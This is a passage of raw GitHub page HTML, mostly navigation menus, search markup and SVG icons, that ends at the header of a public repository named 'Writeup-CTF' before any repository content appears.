1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="253413964" data-scoped-search-url="/HaoJame/Writeup-CTF/search" data-owner-scoped-search-url="/users/HaoJame/search" data-unscoped-search-url="/search" data-turbo="false" action="/HaoJame/Writeup-CTF/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="DgeTAZQoT8W9w8xYynt1oWF4M6OJbj/9a90aRngWAw0mMSZ30uGWTdvzPWPavgnOkRrExxl8gp9KjdGQTjoW8A==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> HaoJame </span> <span>/</span> Writeup-CTF
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
